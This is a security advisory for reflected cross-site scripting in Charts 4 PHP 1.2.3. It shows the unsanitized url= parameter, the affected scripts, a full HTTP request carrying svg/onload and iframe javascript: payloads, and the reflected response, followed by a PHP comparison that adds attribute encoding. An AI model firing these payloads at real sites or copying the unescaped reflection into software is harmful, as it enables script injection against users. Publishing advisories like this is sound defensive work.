Charts 4 PHP 1.2.3 Cross Site Scripting
Posted on 10 February 2016
# Exploit Title: Charts 4 PHP 1.2.3 Cross Site Scripting
# Date: 2016/2/7
# Researcher: 1N3 @CrowdShield - https://crowdshield.com
# Vendor Homepage: http://www.chartphp.com
# Software Link: http://www.chartphp.com
# Version: 1.2.3
# CVE : N/A

+- --=[Description:

Charts 4 PHP version 1.2.3 is vulnerable to multiple reflected cross-site scripting vulnerabilities: several default pages fail to sanitize user input supplied via the url= parameter before reflecting it back into the page.

+- --=[Affected Params:

url=

+- --=[Bug Evidence:

VULNERABLE CODE:

User input is passed through function parameters without sanitization (line numbers refer to the source file):

    6: $url = $_GET['url'];
    8: if($url)
    9: $rss = fetch_rss($url);

Vulnerability is also triggered in:

    /crowdshield/charts4php/bootstrap/rss/scripts/magpie_debug.php
    /crowdshield/charts4php/bootstrap/rss/scripts/simple_smarty.php
    /crowdshield/charts4php/bootstrap/rss/scripts/magpie_slashbox.php
    /crowdshield/charts4php/bootstrap/rss/rss_fetch.inc
    /crowdshield/charts4php/bootstrap/rss/rss_parse.inc

HTTP REQUEST:

    GET /charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+ HTTP/1.1
    Host: host.com
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://crowdshield.com/charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%3Ciframe+src%3D%22+javascript%3Aalert%28%27https%3A%2F%2Fcrowdshield.com%27%29%3B%22%3E%3C%2Fiframe%3E+
    Cookie: __cfduid=d89da9abfef7f775eadafcdc1008eac6b1454814806; __utma=242435792.1300894982.1454814681.1454885335.1454891081.5; __utmz=242435792.1454814681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1300894982.1454814681; __atuvc=1%7C5%2C5%7C6; PHPSESSID=qlct9igheoh2ofg7bo8g8ss691; __utmb=242435792.31.10.1454891081; __utmc=242435792; __atuvs=56b7e04adb06138a001
    Connection: close

RESPONSE BODY (excerpt, showing the url= value reflected unescaped into the input's value attribute):

    Channel: <p><ul></ul> <form> RSS URL: <input type="text" size="30" name="url" value=""><svg/onload=alert(1)>'"-- "><br /> <input type="submit" value="Parse RSS"> </form>
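The reflection visible in the response body above, beside a hardened version that encodes the value for an HTML attribute context. This is an added example, not Charts 4 PHP's own code; the form markup and the decoded url= payload are taken from the evidence, and the function names are assumptions.

```php
<?php
// Added example (not Charts 4 PHP's own code). render_form_vulnerable mirrors the
// reflection in the advisory's response: the url= value lands inside value="..."
// without any encoding, so a " in the input closes the attribute early.
function render_form_vulnerable(string $url): string
{
    return '<form> RSS URL: <input type="text" size="30" name="url" value="'
        . $url . '"><br /> <input type="submit" value="Parse RSS"> </form>';
}

// Hardened form: encode for the attribute context before interpolating.
// ENT_QUOTES encodes both " and ' (the payload uses both), ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently producing an empty string, and the charset is explicit.
function render_form_hardened(string $url): string
{
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form> RSS URL: <input type="text" size="30" name="url" value="'
        . $safe . '"><br /> <input type="submit" value="Parse RSS"> </form>';
}

// Constructed input: the URL-decoded form of the advisory's url= parameter
// (%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+).
$payload = '"><svg/onload=alert(1)>\'"-- ';

echo render_form_vulnerable($payload), PHP_EOL;
// value=""><svg/onload=alert(1)>'"-- "> ... the attribute ends at the first "
// and an <svg> element with an onload handler becomes part of the page.

echo render_form_hardened($payload), PHP_EOL;
// value="&quot;&gt;&lt;svg/onload=alert(1)&gt;&#039;&quot;-- "> ... every
// delimiter is encoded, so the browser keeps the whole string inside the attribute.
```

Note that htmlspecialchars() without ENT_QUOTES leaves single quotes untouched, which is not enough if the template ever uses single-quoted attributes; encoding for the exact output context (attribute, text node, URL, JavaScript) is the general fix.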